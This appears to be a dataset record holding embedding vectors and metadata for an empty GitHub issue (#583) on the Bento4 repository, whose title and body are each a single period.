-0.001883678138256073, -0.008853287436068058, -0.00072539719985798, 0.00985308550298214, -0.0018266243860125542, 0.005654656793922186, 0.010947068221867085, 0.014996975660324097, 0.0016436902806162834, 0.00674139428883791, 0.011975846253335476, 0.030660483986139297, -0.020126376301050186, 0.005162002518773079, 0.002160796197131276, 0.003274702001363039, 0.004701950587332249, -0.008346143178641796, -0.01705453172326088, 0.008838796988129616, -0.0007774700061418116, 0.01206278521567583, -0.002206076867878437, 0.0020195203833281994, -0.009671962819993496, -0.006574761122465134, 0.025878839194774628, 0.01940188556909561, 0.0002474591601639986, 0.006889915093779564, 0.022256381809711456, 0.01999596692621708, 0.012866970151662827, -0.02948680706322193, 0.0046113887801766396, -0.03167477250099182, 0.013569727540016174, 0.004604144021868706, -0.003223987529054284, -0.017329838126897812, 0.0011483191046863794, 0.037238866090774536, 0.011613599956035614, 0.001990540651604533, -0.004727307707071304, 0.01080216933041811, -0.022314341738820076, 0.012294622138142586, 0.007911448366940022, 0.011294824071228504, -0.012338091619312763, 0.015460650436580181, -0.015025955624878407, -0.015185344032943249, -0.002644394291564822, 0.02228536084294319, -0.006085729226469994, 0.008505531586706638, -0.0003808109031524509, -0.007223180960863829, -0.030602524057030678, -0.004883073270320892, 0.015706976875662804, -0.009577779099345207, 0.0023817659821361303, 0.021401481702923775, 0.0017577976686879992, -0.0027566903736442327, -0.004629501141607761, -0.005473534110933542, -0.008520021103322506, 0.006335678976029158, -0.02240128070116043, 0.0045425621792674065, 0.008346143178641796, -0.005672769155353308, 0.01935841515660286, 0.013352380134165287, -0.004332459531724453, 0.0017007440328598022, -0.022024543955922127, -0.0011528471950441599, -0.004028173163533211, 0.023357609286904335, 0.0262700654566288, 0.022604137659072876, -0.0183151476085186, -0.0011709595564752817, 0.008722878992557526, -0.0045280721969902515, -0.005556850228458643, -0.022270871326327324, -0.013750850223004818, 0.00800563208758831, -0.012417785823345184, 0.006933384574949741, 0.010360229760408401, -0.0031605944968760014, -0.00018949982768390328, -0.016460448503494263, -0.015866365283727646, -0.016286570578813553, 0.02195209451019764, -0.0017378742340952158, 0.01380156446248293, -0.01567799784243107, -0.012533704750239849, 0.008251959457993507, -0.014757893979549408, 0.008114305324852467, 0.016866164281964302, -0.01356248278170824, -0.004814246669411659, -0.008085326291620731, 0.017721064388751984, -0.008462062105536461, 0.032399263232946396, 0.023024342954158783, 0.02429944835603237, -0.007092772517353296, -0.0029740380123257637, -0.013156767003238201, 0.005712616257369518, 0.006085729226469994, -0.012164213694632053, -0.004010060802102089, 0.027284353971481323, -0.007208691444247961, 0.011157170869410038, 0.0032475334592163563, -0.023531487211585045, -0.010244310833513737, 0.02177821658551693, -0.004096999764442444, 0.0052851662039756775, 0.0009735355852171779, -0.00503883883357048, 0.019836580380797386, -0.003481182036921382, -0.03184865042567253, -0.023183731362223625, -0.006734149064868689, 0.0008965583401732147, 0.01425799448043108, -0.0014978863764554262, 0.0056111873127520084, 0.0063501689583063126, 0.00566190155223012, -0.001056852051988244, 0.012482989579439163, -0.022546177729964256, -0.006755883805453777, -0.014156566001474857, -0.008288184180855751, 0.00342684518545866, 0.0009735355852171779, 0.028443539515137672, -0.032283343374729156, 0.010534107685089111, 0.012765541672706604, -0.013946463353931904, -0.013576972298324108, -0.0034141666255891323, 0.005408329889178276, -0.008143285289406776, -0.003126181196421385, -0.012482989579439163, -0.019662702456116676, -0.024502305313944817, 0.0023328629322350025, 0.021923115476965904, 0.014344933442771435, -0.0022223780397325754, 0.012895950116217136, -0.0075057330541312695, -0.012620643712580204, -0.0044556232169270515, -0.00815053004771471, -0.01866290345788002, -0.006212515290826559, -0.02003943733870983, 0.022430259734392166, -0.010302270762622356, -0.018633924424648285, -0.018112288787961006, 0.0030283748637884855, 0.008592470549046993, -0.00909961387515068, -0.004730930086225271, -0.016576368361711502, -0.025965778157114983, -0.003339906223118305, 0.01108472142368555, -0.0021300052758306265, -0.022546177729964256, 0.025589043274521828, -0.015156364068388939, 0.012751052156090736, 0.017199430614709854, -0.014562280848622322, -0.012482989579439163, 0.029110072180628777, 0.016692286357283592, -0.018923720344901085, 0.0031442935578525066, -0.025023939087986946, -0.01924249716103077, 0.012562683783471584, -0.01492452621459961, -0.012446765787899494, -0.009056144393980503, 0.017431268468499184, -0.022039033472537994, -0.023835772648453712, -0.009070634841918945, 0.013345135375857353, 0.0055133807472884655, 0.03497845306992531, -0.007483997847884893, 0.01647493802011013, 0.0034467687364667654, 0.006433485075831413, -0.019170047715306282, -0.02011188678443432, -0.01235258113592863, -0.010258801281452179, 0.009599513374269009, 0.011128190904855728, 0.0005474439822137356, -0.008222979493439198, 0.02050311118364334, 0.011961355805397034, -0.007585426792502403, 0.01802534982562065, 0.011852682568132877, -0.011360027827322483, 0.016112692654132843, 0.016315549612045288, -0.007259405683726072, -0.007143487222492695, 0.0074912430718541145, 0.013989932835102081, -0.00186918827239424, -0.01059931144118309, 0.0064226179383695126, 0.0069297621957957745, -0.032862938940525055, -0.026241084560751915, -0.024502305313944817, 0.010034208185970783, -0.015938814729452133, -0.006766751408576965, 0.00009803276770981029, 0.006647210102528334, -0.0004396758449729532, -0.00465123588219285, 0.01682269386947155, 0.0078317541629076, 0.018329637125134468, -0.0037927133962512016, 0.0436723530292511, 0.011273088864982128, -0.00314610474742949, -0.006111086346209049, 0.005480778869241476, -0.025081899017095566, 0.005821289960294962, -0.010932577773928642, -0.009461860172450542, -0.012243907898664474, -0.018242698162794113, -0.005759708117693663, 0.010570332407951355, 0.0024813837371766567, 0.018213719129562378, -0.019083108752965927, -0.020662499591708183, 0.004531695041805506, -0.011396252550184727, 0.014040647074580193, 0.017489226534962654, 0.0017324405489489436, 0.015735957771539688, -0.004361439496278763, -0.008643184788525105, -0.0021952094975858927, 0.0070746601559221745, 0.03402212634682655, 0.007991142570972443, -0.02402414008975029, 0.02315475046634674, -0.012497480027377605, 0.010606557130813599, 0.008404102176427841, 0.007462263107299805, -0.013982687145471573, 0.006321188993752003, -0.0025230420287698507, -0.010990537703037262, 0.011736763641238213, -0.0064371079206466675, 0.005397462286055088, 0.022560667246580124, -0.013866769149899483, 0.00993277970701456, 0.011417987756431103, -0.010266046039760113, 0.016170652583241463, 0.014330443926155567, -0.00401730602607131, 0.00124159746337682, 0.0072268033400177956, 0.006085729226469994, -0.00786073412746191, 0.006810220889747143, -0.023647405207157135, -0.006187158171087503, -0.007599916774779558, -0.015388200990855694, 0.006176290567964315, 0.008990940637886524, -0.0031189362052828074, -0.030689463019371033, 0.004495470318943262, 0.006176290567964315, 0.019677191972732544, 0.008679409511387348, -0.002242301357910037, 0.03254416212439537, -0.00034051103284582496, 0.017315348610281944, 0.0091575738042593, -0.006067616865038872, 0.005419197026640177, -0.0026932975742965937, 0.008592470549046993, -0.0029124561697244644, 0.0061835357919335365, -0.0030446758028119802, 0.0015812028432264924, 0.0008702955092303455, 0.00314610474742949, -0.022096993401646614, -0.000016852918633958325, -0.0313270166516304, 0.021300053223967552, -0.012794521637260914, -0.007266650442034006, 0.0018764332635328174, -0.0050352164544165134, -0.00033530377550050616, 0.014910036697983742, -0.04089030623435974, 0.010005229152739048, -0.02799435518682003, -0.015025955624878407, 0.03949928283691406, 0.012294622138142586, -0.018286166712641716, 0.007824509404599667, 0.0005546888569369912, -0.01443187240511179, 0.010418188758194447, -0.015866365283727646, -0.006031392607837915, -0.005013481713831425, -0.016924124211072922, -0.020604541525244713, -0.000007251991064549657, -0.014272483997046947, -0.02528475597500801, 0.010563087649643421, 0.010461658239364624, -0.037934377789497375, -0.0007675082888454199, 0.012968399561941624, -0.007607161533087492, 0.013410339131951332, -0.009642982855439186, -0.01492452621459961, 0.01659085787832737, 0.021647809073328972, -0.00878083799034357, 0.0064950669184327126, -0.011215129867196083, 0.0016491239657625556, 0.0023129393812268972, 0.00996175967156887, -0.02979109436273575, -0.005375727545469999, 0.017894942313432693, -0.012106254696846008, -0.0000124168236652622, -0.00660736346617341, 0.020807398483157158, -0.018329637125134468, 0.020068416371941566, -0.0039158770814538, 0.021358011290431023, 0.001370194717310369, 0.00855624582618475, -0.02540067583322525, -0.0038941423408687115, 0.0007086433470249176, -0.0017143281875178218, 0.019430864602327347, -0.017141470685601234, -0.005125777795910835, -0.002164418576285243, -0.008947471156716347, 0.0007928654667921364, 0.02396618202328682, -0.005799555219709873, -0.0013457430759444833, -0.008585224859416485, 0.011475946754217148, 0.011649824678897858, 0.012070029973983765, 0.0007634329958818853, -0.016141671687364578, 0.009092369116842747, 0.023545976728200912, 0.005169247277081013, 0.004513582680374384, 0.0021173267159610987, -0.013605952262878418, 0.004586031660437584, -0.021705767139792442, 0.0021517400164157152, 0.014569525606930256, -0.0032910029403865337, 0.019966987892985344, -0.0015386389568448067, 0.013931972905993462, 0.001436304533854127, -0.014982486143708229, 0.006908027455210686, -0.012251152656972408, 0.008469306863844395, -0.0018012671498581767, -0.008650429546833038, -0.010063188150525093, -0.012794521637260914, -0.0030555431731045246, -0.007607161533087492, -0.006295831874012947, -0.0043831742368638515, 0.009432880207896233, -0.007882468402385712, -0.014866567216813564, 0.0023509752936661243, -0.014707178808748722, 0.0034503911156207323, 0.008599715307354927, -0.00244697043672204, 0.012852480635046959, 0.022908423095941544, -0.00021123458282090724, -0.021705767139792442, 0.009063390083611012, 0.004807001445442438, 0.02154638059437275, -0.008491041138768196, 0.0019090353744104505, -0.003348962403833866, -0.0032439110800623894, 0.004879450891166925, 0.004691082984209061, 0.018155759200453758, 0.0006515895947813988, -0.009766146540641785, 0.0012950287200510502, 0.008679409511387348, -0.011077476665377617, 0.028472518548369408, -0.0023654650431126356, -0.016518408432602882, 0.008201244287192822, 0.011693294160068035, -0.003381564514711499, 0.0078317541629076, -0.005194604862481356, -0.0032257987186312675, -0.005306900944560766, 0.005049706436693668, 0.008063591085374355, -0.022140461951494217, 0.012120744213461876, 0.00835338793694973, -0.0013982687378302217, -0.006216137669980526, 0.0022767148911952972, -0.017416777089238167, 0.010229821316897869, 0.014526056125760078, 0.008020121604204178, -0.004821491427719593, -0.010526862926781178, 0.005154757760465145, 0.002468705177307129, 0.010563087649643421, -0.015692487359046936, -0.004390418995171785, -0.014620239846408367, 0.018416576087474823, -0.0035373300779610872, -0.00611833157017827, 0.0023817659821361303, -0.0015504120383411646, -0.0018854893278330564, -0.02282148413360119, -0.0038760299794375896, 0.018822291865944862, -0.0030464872252196074, 0.03686213120818138, -0.00632481137290597, 0.010324005037546158, -0.009947269223630428, 0.02569047175347805, -0.013040848076343536, -0.027834966778755188, -0.0018546984065324068, 0.0022368677891790867, 0.019561272114515305, 0.006429862696677446, -0.018735352903604507, -0.002528475597500801, 0.016605347394943237, -0.0007724891765974462, -0.012874215841293335, 0.007715835236012936, 0.002486817305907607, 0.013519013300538063, 0.0008893134072422981, 0.011483191512525082, 0.018575964495539665, 0.004622256383299828, 0.001916280249133706, -0.004662103485316038, -0.01132380310446024, -0.0008272788254544139, 0.017358819022774696, -0.01998147740960121, -0.0037238867953419685, -0.010084922425448895, 0.0034757484681904316, -0.010736965574324131, -0.0071688443422317505, 0.02787843532860279, -0.015243303030729294, -0.020662499591708183, -0.011454211547970772, -0.012033805251121521, 0.007817264646291733, -0.003361640963703394, 0.029515787959098816, -0.012294622138142586, 0.008577980101108551, 0.025603532791137695, -0.004317970015108585, 0.003227609908208251, 0.006397260818630457, 0.002814649837091565, -0.0032837581820786, -0.0018854893278330564, -0.005085931159555912, 0.00510042067617178, -0.02234332077205181, -0.007081905379891396, -0.00741517124697566, 0.021010255441069603, 0.023777814581990242, 0.028834765776991844, -0.006451597437262535, -0.015620038844645023, -0.0019814844708889723, -0.010512372478842735, 0.001809417735785246, 0.004042663145810366, 0.007773794699460268, -0.0028436295688152313, 0.0033326612319797277, 0.005350370425730944, -0.01596779376268387, 0.022039033472537994, 0.016634326428174973, -0.004796134307980537, -0.006390015594661236, -0.010729720816016197, 0.011417987756431103, 0.029399868100881577, 0.0015802972484380007, 0.030109871178865433, 0.013417583890259266, -0.012367071583867073, 0.004658481106162071, -0.02032923325896263, 0.002021331572905183, 0.01483034249395132, -0.018358616158366203, -0.005872004199773073, 0.007759304717183113, -0.019604742527008057, 0.02425597794353962, 0.0023980671539902687, -0.01773555390536785, -0.00016516144387423992, -0.006063994485884905, 0.008273693732917309, 0.000304512883303687, 0.004252765793353319, -0.009831351228058338, 0.009635738097131252, -0.01218594890087843, -0.0354711078107357, 0.008012876845896244, 0.019213516265153885, 0.0036496263928711414, 0.01264962274581194, -0.015692487359046936, 0.009280737489461899, 0.0018655657768249512, -0.011381763033568859, -0.0051873596385121346, 0.0034051104448735714, -0.007549202535301447, 0.002090158173814416, 0.00004932768933940679, 0.01495350617915392, 0.008889512158930302, -0.0030138848815113306, 0.011917886324226856, 0.004861338529735804, -0.006824710872024298, -0.00005541228529182263, 0.006027769763022661, -0.02863190695643425, 0.0041332244873046875, 0.011570130474865437, -0.008280938491225243, 0.008802573196589947, -0.012722072191536427, -0.018445555120706558, 0.005984300281852484, -0.009556043893098831, -0.0037275091744959354, 0.002008653013035655, -0.0064117503352463245, -0.01751820743083954, -0.028356600552797318, 0.00975890178233385, 0.0009572345297783613, -0.018155759200453758, 0.019314944744110107, 0.0022785260807722807, 0.014453606680035591, -0.00999798346310854, -0.000964479404501617, 0.011302068829536438, -0.0019869182724505663, -0.0030736555345356464, 0.0049627674743533134, 0.002984905382618308, 0.004328837152570486, -0.01252645906060934, 0.007339099887758493, 0.027516189962625504, -0.025820879265666008, 0.006332056596875191, 0.0014381158398464322, -0.014156566001474857, -0.005723483394831419, -0.010229821316897869, 0.012772786431014538, 0.009114104323089123, 0.002785670105367899, -0.012468500062823296, -0.0068428232334554195, -0.004691082984209061, 0.012309111654758453, 0.025994757190346718, 0.021169643849134445, 0.026183126494288445, 0.002823706017807126, -0.010360229760408401, 0.0028019712772220373, 0.008136040531098843, -0.002524853218346834, 0.0037890910170972347, -0.016272081062197685, -0.005676391534507275, 0.014410137198865414, -0.007512977812439203, 0.005915473680943251, 0.018561474978923798, -0.009947269223630428, -0.020532092079520226, 0.006723281927406788, -0.01872086338698864, -0.012772786431014538, -0.0038796523585915565, 0.02143046073615551, 0.012012070044875145, 0.010403699241578579, 0.012280132621526718, -0.006386393215507269, 0.00279472628608346, 0.012243907898664474, 0.023995161056518555, 0.0043034800328314304, -0.00803461205214262, 0.011019516736268997, -0.013040848076343536, 0.011504926718771458, -0.011997580528259277, -0.010896353051066399, 0.01215696893632412, -0.012975644320249557, -0.027892926707863808, -0.017199430614709854, 0.0015205267118290067, -0.00712899724021554, -0.00895471591502428, -0.02760312892496586, 0.027110476046800613, 0.010410943999886513, 0.017431268468499184, -0.009802371263504028, -0.015735957771539688, -0.0019651835318654776, 0.01025155559182167, 0.004346949514001608, -0.025545572862029076, -0.008650429546833038, -0.030254768207669258, -0.003510161768645048, 0.008099815808236599, 0.0003812637005466968, -0.00020466887508518994, -0.004506337456405163, -0.009425635449588299, -0.009403901174664497, -0.01974964141845703, -0.0029776603914797306, 0.0360506996512413, 0.018807802349328995, 0.005306900944560766, 0.02414005994796753, 0.0033091153018176556, -0.03468865528702736, 0.0023817659821361303, 0.00008642957982374355, 0.02228536084294319, -0.0030030175112187862, -0.00988206546753645, -0.007339099887758493, 0.021589849144220352, -0.010954312980175018, -0.021242093294858932, 0.0002766652323771268, -0.00447735795751214, 0.01572146825492382, 0.015315752476453781, 0.0037601112853735685, -0.006763129029422998, 0.013098808005452156, 0.000871653959620744, 0.0038724076002836227, 0.008831552229821682, 0.005433687008917332, 0.02114066481590271, 0.003955724183470011, 0.004002816043794155, 0.0034666922874748707, -0.006940629333257675, 0.02505291812121868, -0.009201043285429478, 0.03639845550060272, -0.0008141474099829793, 0.005288788583129644, -0.011222374625504017, -0.006958741694688797, -0.00220245448872447, 0.023314138874411583, 0.009063390083611012, 0.005915473680943251, -0.017779024317860603, 0.0019887294620275497, -0.0008734651491977274, 0.01837310567498207, -0.014707178808748722, -0.025313736870884895, -0.008961960673332214, -0.01767759397625923, -0.0007095489418134093, -0.011881661601364613, -0.0036260804627090693, -0.014120341278612614, -0.013040848076343536, -0.0045425621792674065, 0.00033032288774847984, 0.014707178808748722, -0.005216339603066444, 0.02119862288236618, 0.03225436434149742, 0.02840007096529007, -0.0000155652487592306, 0.0006407222244888544, 0.009454615414142609, 0.023864753544330597, -0.000060506368754431605, -0.004307102411985397, -0.018010860309004784, -0.005600320175290108, 0.008592470549046993, 0.018865760415792465, 0.010845638811588287, -0.0018583209021016955, -0.0008757291943766177, 0.003597100730985403, -0.003348962403833866, 0.01901065930724144, 0.012765541672706604, 0.014192789793014526, 0.010758699849247932, 0.012497480027377605, -0.0058466470800340176, -0.0005746124079450965, -0.005198227241635323, -0.012178703211247921, -0.0018655657768249512, 0.019387394189834595, -0.013685646466910839, 0.03294987604022026, 0.010019718669354916, -0.005259809084236622, 0.015156364068388939, 0.02679169923067093, 0.0021173267159610987, -0.003933989442884922, 0.007759304717183113, 0.0174022875726223, 0.0030319972429424524, 0.013156767003238201, -0.0013448374811559916, -0.005502513609826565, 0.014018911868333817, 0.007378946989774704, 0.004937410354614258, 0.003099012654274702, 0.016967592760920525, -0.021473931148648262, 0.005267053842544556, -0.007759304717183113, 0.03219640627503395, 0.006524046882987022, 0.008411346934735775, 0.002403500722721219, -0.012272887863218784, 0.012707582674920559, 0.06259607523679733, -0.002671562833711505, -0.002218755427747965, -0.01579391583800316, 0.010179107077419758, -0.000946367159485817, -0.018967188894748688, 0.025878839194774628, 0.0075057330541312695, 0.011867172084748745, -0.012309111654758453, 0.009548799134790897, -0.0006855501560494304, 0.009027165360748768, 0.001752363983541727, -0.006777619011700153, 0.015083914622664452, -0.0014308708487078547, -0.021271072328090668, -0.007520222570747137, 0.006719659548252821, -0.015475139953196049, 0.024560265243053436, 0.007991142570972443, -0.0024578378070145845, -0.011946866288781166, -0.014236259274184704, -0.0065928734838962555, -0.01693861372768879, -0.0019398261792957783, -0.009606758132576942, 0.0005823101382702589, -0.005958943162113428, 0.0010514183668419719, -0.014533300884068012, -0.002749445615336299, 0.005600320175290108, 0.0004152242327108979, 0.0020430663134902716, 0.013823299668729305, -0.027719048783183098, -0.009766146540641785, -0.003597100730985403, 0.0018728107679635286, 0.008766348473727703, -0.01495350617915392, -0.0010124769760295749, -0.006668944843113422, -0.023719854652881622, 0.007393436506390572, -0.006245117634534836, -0.0013547992566600442, -0.020082905888557434, 0.01345380861312151, 0.007219558581709862, 0.0268496572971344, -0.021155154332518578, -0.009215532802045345, 0.036311518400907516, 0.0021933983080089092, 0.01693861372768879, 0.018518004566431046, 0.007020323537290096, 0.010273290798068047, 0.02441536635160446, 0.005582207813858986, -0.02027127519249916, -0.008375123143196106, 0.004238275811076164, 0.0024143680930137634, 0.006520424038171768, -0.018039841204881668, -0.011903396807610989, 0.0012008447665721178, -0.00011439043009886518, 0.0014661898603662848, -0.013765339739620686, -0.0014381158398464322, 0.0032765131909400225, 0.010679005645215511, 0.007295630406588316, -0.007426038850098848, 0.012490235269069672, 0.017126981168985367, 0.021850666031241417, 0.0020557448733597994, -0.01258441898971796, 0.01780800335109234, -0.010099412873387337, 0.007364457007497549, -0.007045680657029152, -0.030109871178865433, -0.02429944835603237, -0.0073246099054813385, 0.007426038850098848, 0.0026679402217268944, -0.012367071583867073, 0.017532696947455406, 0.0025357205886393785, -0.023401077836751938, 0.008266448974609375, 0.00629220949485898, 0.014163810759782791, 0.020590050145983696, -0.008990940637886524, 0.017590655013918877, -0.003651437582448125, -0.0008671258692629635, 0.018561474978923798, -0.02660333178937435, -0.015735957771539688, -0.011244109831750393, -0.007607161533087492, -0.011794722639024258, -0.00838236790150404, -0.003905009711161256, 0.003245722269639373, -0.05085930973291397, -0.0023002608213573694, 0.004904808010905981, 0.021691277623176575, 0.005571340210735798, 0.005292410962283611, -0.0023455414921045303, -0.005422819405794144, -0.028907213360071182, 0.006940629333257675, 0.00492654275149107, 0.0018103233305737376, -0.011280333623290062, -0.008346143178641796, 0.021792706102132797, -0.0013855901779606938, -0.012794521637260914, 0.04946828633546829, 0.01080216933041811, 0.019097598269581795, -0.0004537128552328795, 0.008817062713205814, 0.009295227006077766, 0.005353992804884911, -0.014801363460719585, -0.015735957771539688, 0.019199026748538017, -0.014330443926155567, -0.01255543902516365, 0.017300859093666077, -0.001943448674865067, 0.0026045471895486116, 0.011012271977961063, -0.003307304112240672, -0.003256589639931917, -0.011475946754217148, -0.020242294296622276, -0.023661894723773003, 0.008534510619938374, 0.022966383025050163, -0.022140461951494217, 0.004738174844533205, 0.007824509404599667, 0.004379551857709885, -0.010534107685089111, 0.015098405070602894, -0.010592066682875156, 0.014866567216813564, -0.016344530507922173, -0.01146145723760128, 0.01986555941402912, 0.006418995559215546, 0.005535115487873554, 0.006636342965066433, 0.022792505100369453, 0.003278324380517006, -0.01930045522749424, 0.0017478358931839466, 0.01388125866651535, -0.019604742527008057, 0.0005963471485301852, 0.009737166576087475, -0.0020593672525137663, -0.014127586036920547, 0.006821088492870331, 0.018344126641750336, 0.014424627646803856, 0.0014770572306588292, 0.006860935129225254, -0.0015187155222520232, 0.008802573196589947, -0.007313742768019438, -0.025878839194774628, 0.00832440797239542, -0.0069913435727357864, 0.0029631706420332193, -0.009737166576087475, 0.0019977856427431107, -0.012823500670492649, -0.011251354590058327, 0.007078283000737429, -0.02240128070116043, -0.012265642173588276, 0.0019977856427431107, 0.01969168148934841, -0.021807197481393814, 0.015504119917750359, 0.013156767003238201, 0.005169247277081013, -0.0008186755003407598, 0.0020756684243679047, -0.010758699849247932, -0.008679409511387348, 0.007462263107299805, -0.016460448503494263, 0.00692613935098052, 0.009447370655834675, -0.02690761722624302, -0.011468701995909214, 0.0009151234407909214, 0.0013249139301478863, -0.00012282397074159235, -0.010758699849247932, -0.026299044489860535, -0.008085326291620731, -0.007838998921215534, 0.023705365136265755, 0.03552906587719917, 0.0074912430718541145, -0.02642945386469364, -0.01601126417517662, 0.0017143281875178218, -0.012794521637260914, -0.01307707279920578, -0.003923121839761734, -0.004596899263560772, 0.026690270751714706, -0.003767356276512146, 0.01769208535552025, -0.017663104459643364, 0.0008481079712510109, 0.007933182641863823, -0.02131454274058342, 0.0043723066337406635, -0.005158380139619112, -0.018054330721497536, 0.008541755378246307, 0.003162405686452985, 0.00436506187543273, -0.015069425106048584, -0.003484804416075349, 0.014330443926155567, 0.006542159244418144, -0.0049482774920761585, -0.005567717831581831, 0.009309716522693634, 0.009077879600226879, -0.012693092226982117, 0.003292814362794161, 0.03668825328350067, 0.008070835843682289, 0.01827167719602585, -0.0033471512142568827, -0.0002118005941156298, 0.014337688684463501, 0.003026563674211502, 0.014504321850836277, -0.0077303252182900906, -0.01744575798511505, 0.010389209724962711, 0.01883678138256073, 0.003941234201192856, 0.021647809073328972, -0.012635133229196072, 0.00604950450360775, 0.016387999057769775, 0.005194604862481356, -0.026878638193011284, 0.04633847996592522, -0.004368684254586697, -0.0035355188883841038, -0.0000946933141676709, 0.010867374017834663, -0.002140872646123171, -0.0017215731786563993, 0.007063793018460274, -0.01761963590979576, 0.019285965710878372, 0.01693861372768879, 0.011816457845270634, -0.007005833555012941, 0.004314347170293331, -0.005582207813858986, 0.027371292933821678, 0.009266247041523457, -0.0324862040579319, 0.010650026611983776, -0.001065908232703805, -0.007846243679523468, -0.0016310117207467556, 0.010932577773928642, 0.0035427638795226812, 0.015562078915536404, -0.010374719277024269, -0.006973231676965952, 0.012707582674920559, -0.0001081643276847899, -0.012620643712580204, -0.009570533409714699, -0.0011573752854019403, -0.008990940637886524, 0.006013280246406794, 0.016503918915987015, 0.014555036090314388, -0.004506337456405163, 0.033152736723423004, 0.01230186689645052, 0.018460046499967575, 0.001125678769312799, -0.028762316331267357, 0.015243303030729294, 0.03813723847270012, 0.010157371871173382, -0.02056107111275196, -0.02367638424038887, 0.014207280240952969, 0.006375526078045368, 0.011888907290995121, -0.028733335435390472, 0.021792706102132797, -0.0017605145694687963, -0.005049706436693668, 0.028849255293607712, 0.018822291865944862, 0.005379349924623966, 0.018242698162794113, -0.010845638811588287, -0.001943448674865067, -0.02303883247077465, -0.018503515049815178, 0.025328226387500763 ]
1,664
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
.
.
https://api.github.com/repos/axiomatic-systems/Bento4/issues/583/comments
0
2021-03-01T19:09:58
2021-03-19T20:33:08Z
https://github.com/axiomatic-systems/Bento4/issues/583
819,165,485
583
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : . Issue date: --- start body --- . --- end body ---
122
[ -0.004308800213038921, 0.0074480073526501656, -0.0016467791283503175, 0.0428532175719738, 0.030783357098698616, 0.007952366955578327, -0.0057044867426157, 0.07057563215494156, -0.01923524960875511, 0.02657455950975418, 0.011730720289051533, 0.014017731882631779, 0.017226506024599075, 0.026435425505042076, -0.01659170724451542, 0.020452670753002167, -0.02201792597770691, -0.012052467092871666, -0.01653953269124031, -0.015661250799894333, 0.019478734582662582, -0.010626344941556454, 0.017035197466611862, 0.038922686129808426, 0.00830020196735859, 0.00937414076179266, -0.02664412558078766, 0.011313318274915218, -0.0168438870459795, -0.002421797951683402, 0.022644028067588806, 0.015661250799894333, -0.002854417311027646, 0.01355685107409954, 0.029722461476922035, 0.013226408511400223, 0.0585753358900547, 0.04678374528884888, -0.02824416570365429, 0.012113338336348534, -0.017183026298880577, -0.053357820957899094, -0.018400447443127632, 0.03753134608268738, -0.013748160563409328, 0.00855673011392355, 0.014582963660359383, 0.015087323263287544, -0.01560907531529665, 0.0009375227964483202, 0.022730987519025803, -0.021252689883112907, -0.02718327008187771, -0.04580980911850929, -0.0010402427287772298, -0.03363560140132904, 0.036522626876831055, 0.01300901174545288, -0.008834997192025185, 0.014417742379009724, -0.02386144921183586, -0.00453924061730504, 0.0212005153298378, 0.0271310955286026, 0.004865335766226053, 0.0346791036427021, -0.03290514647960663, 0.0303659550845623, -0.024904953315854073, 0.055236127227544785, 0.0005804488901048899, -0.014852534979581833, 0.01733085699379444, 0.02441798523068428, 0.0014424263499677181, -0.03763569891452789, 0.04511414095759392, -0.003606609534472227, -0.015304720029234886, 0.017591731622815132, -0.03146163374185562, 0.006752338260412216, -0.06187976524233818, 0.014635138213634491, 0.010652433149516582, 0.0046175033785402775, -0.04174014553427696, -0.08438465744256973, -0.027235444635152817, 0.005043601151555777, 0.01045242790132761, 0.00760453287512064, 0.036000873893499374, -0.03321819752454758, 0.029200710356235504, 0.01425252016633749, 0.003343559568747878, -0.0157221220433712, -0.052557799965143204, -0.017843911424279213, -0.01300901174545288, -0.016348224133253098, 0.014452525414526463, -0.014156865887343884, -0.0011435060296207666, 0.008913259953260422, 0.02495712786912918, -0.026783259585499763, 0.004280538763850927, 0.09795020520687103, 0.02659195102751255, -0.0024457117542624474, -0.029687678441405296, -0.0255136638879776, 0.0008065413567237556, 0.02662673406302929, -0.01735694333910942, -0.058262284845113754, -0.01599169336259365, 0.006078408565372229, 0.0010342643363401294, -0.019113508984446526, -0.021391823887825012, -0.011982900090515614, -0.0255136638879776, 0.038435716181993484, -0.026522384956479073, 0.0037957443855702877, -0.002589193405583501, 0.008091500960290432, -0.040870558470487595, -0.02556583844125271, 0.009052393957972527, -0.02194835990667343, 0.002421797951683402, 0.014269912615418434, -0.01683519221842289, 0.060140594840049744, -0.022696204483509064, -0.0020783115178346634, -0.04553154110908508, -0.04706201329827309, 0.04260973259806633, -0.023287523537874222, -0.04292278364300728, -0.01385251060128212, -0.00373704731464386, 0.013391629792749882, -0.030052904039621353, 0.008530641905963421, -0.0004962077364325523, -0.03589652478694916, 0.0071958270855247974, 0.026209333911538124, 0.056870948523283005, -0.004437064286321402, 0.00032881234074011445, 0.0206613726913929, 0.013574243523180485, 0.0009157831664197147, 0.010548082180321217, -0.02062658779323101, 0.019739611074328423, -0.009052393957972527, -0.016687361523509026, -0.038644418120384216, 0.015782993286848068, 0.00753931375220418, -0.011556803248822689, 0.017235200852155685, 0.008543686009943485, -0.0036870462354272604, -0.00843064021319151, -0.012461172416806221, -0.041427094489336014, -0.01262639369815588, 0.024487551301717758, 0.01370468083769083, 0.00001679728302406147, -0.03158337622880936, -0.022087493911385536, 0.0025065827649086714, 0.038713984191417694, 0.0016456921584904194, -0.011817678809165955, -0.01761781983077526, 0.06473200768232346, -0.024487551301717758, 0.04441847279667854, 0.002191357547417283, 0.02257446199655533, 0.022313585504889488, 0.03780961409211159, -0.012930748984217644, 0.05029687657952309, -0.030209429562091827, -0.03427909314632416, -0.025304963812232018, -0.006291457451879978, 0.00868282001465559, 0.027096310630440712, -0.010121985338628292, 0.007013213820755482, -0.003632697043940425, -0.023565789684653282, 0.017496077343821526, -0.03307906538248062, 0.026122374460101128, 0.010556778870522976, -0.0031979039777070284, -0.011374189518392086, -0.030244214460253716, 0.012835094705224037, 0.04080099239945412, 0.009382836520671844, 0.008882824331521988, -0.0391661711037159, -0.006482766475528479, -0.011574194766581059, -0.009730671532452106, -0.0007462137727998197, -0.022644028067588806, 0.02447015978395939, 0.005413175094872713, -0.02170487493276596, -0.012600306421518326, 0.005839272402226925, 0.0035044329706579447, 0.026104982942342758, 0.015539508312940598, 0.0471663661301136, 0.035426948219537735, -0.03445301204919815, -0.01737433485686779, 0.013078578747808933, -0.026661517098546028, 0.0007380614406429231, -0.03448779508471489, 0.017426511272788048, -0.0060653649270534515, -0.018504798412322998, 0.03582695871591568, -0.03934008628129959, -0.026713693514466286, -0.0005972971557639539, 0.05394914001226425, -0.024070151150226593, 0.0157221220433712, -0.005465350113809109, -0.011782894842326641, 0.021757051348686218, 0.010748087428510189, 0.017809128388762474, 0.013104666955769062, -0.0066349441185593605, 